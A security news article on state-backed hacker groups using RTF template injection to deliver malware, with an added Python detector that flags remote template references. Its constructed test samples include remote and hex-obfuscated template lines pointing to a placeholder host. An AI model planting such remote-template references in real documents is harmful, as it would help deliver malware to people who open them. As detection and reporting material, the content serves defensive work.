Several state-backed hacker syndicates have returned to an old-school malware distribution technique, and it is still effective.
According to security researchers at Proofpoint, several advanced persistent threat (APT) syndicates working on behalf of Russia, China, and India use rich text format (RTF) documents to deliver malware.
Inserting malware into RTF documents is definitely not new, as it has been around for a long time. However, this technique is still effective today.
This is because malware in RTF is difficult to detect by antivirus software, and many companies do not block RTF attachments in email, because this is the format they use in their daily business operations.
The technique itself is called RTF template injection. It works by modifying the template property of the RTF document so that the document is 'armed' with an instruction to fetch a remote file, which silently downloads malware onto the victim's computer when the document is opened.
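As an added defensive example (not code from the article or from Proofpoint), a small Python checker that flags an RTF file whose template property points to a remote location rather than a local file; the sample documents are constructed here and use the placeholder domain example.invalid.

```python
import re

# RTF control word that tells Word to load a template when the document opens.
# A local path is normal; an http(s) URL or UNC path is the template-injection signal.
TEMPLATE_RE = re.compile(rb"\\\*\\template(?![a-zA-Z])\s*([^}]*)}", re.IGNORECASE)

def looks_like_rtf(data: bytes) -> bool:
    """Check the RTF magic rather than the file extension (attachments are often renamed)."""
    return data.lstrip().startswith(b"{\\rt")

def decode_hex_escapes(raw: bytes) -> bytes:
    """Resolve \\'hh escapes so a hex-obfuscated target is still readable."""
    return re.sub(rb"\\'([0-9a-fA-F]{2})",
                  lambda m: bytes.fromhex(m.group(1).decode()), raw)

def find_remote_templates(rtf: bytes) -> list:
    """Return every template target in the document that points to a remote location."""
    hits = []
    for m in TEMPLATE_RE.finditer(rtf):
        target = decode_hex_escapes(m.group(1)).strip().decode("latin-1", "replace")
        if re.match(r"^(https?://|\\\\)", target, re.IGNORECASE):
            hits.append(target)
    return hits

# Constructed samples (not real malware): a benign local template, a remote
# reference of the kind the article describes, and the same reference hex-obfuscated.
BENIGN = rb"{\rtf1\ansi{\*\template C:\Templates\normal.dotm}Hello}"
REMOTE = rb"{\rtf1\ansi{\*\template http://example.invalid/lure.dotm}Hello}"
OBFUSCATED = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/x.dotm}Hi}"

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("remote", REMOTE), ("obfuscated", OBFUSCATED)):
        print(name, "->", find_remote_templates(doc) if looks_like_rtf(doc) else "not RTF")
```

Run over inbound RTF attachments, a non-empty result is worth quarantining for analysis even if the antivirus engine is silent.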
The only tricky part of this technique is convincing potential victims to open the document and enable editing, so that the document can start downloading malware.
However, this step can be achieved with the right social engineering, namely profiling the target well so that the attacker can choose a lure document that will attract their attention.
This RTF technique is not complicated; in fact it is much simpler than many other techniques but can still deliver the same results.
"Despite the name advanced persistent threat, if APT actors do their job well, they need very little work and resources to gain access to a particular company or organization," said Sherrod DeGrippo, VP of Threat Research and Detection at Proofpoint.
"That way, the perpetrators can keep their more sophisticated tools hidden if they are caught," DeGrippo added.
The earliest observed use of the RTF technique by an APT syndicate was in February 2021, by the DoNot Team, an APT syndicate linked to the Indian government. Since then, more attacks using the technique have occurred around the world.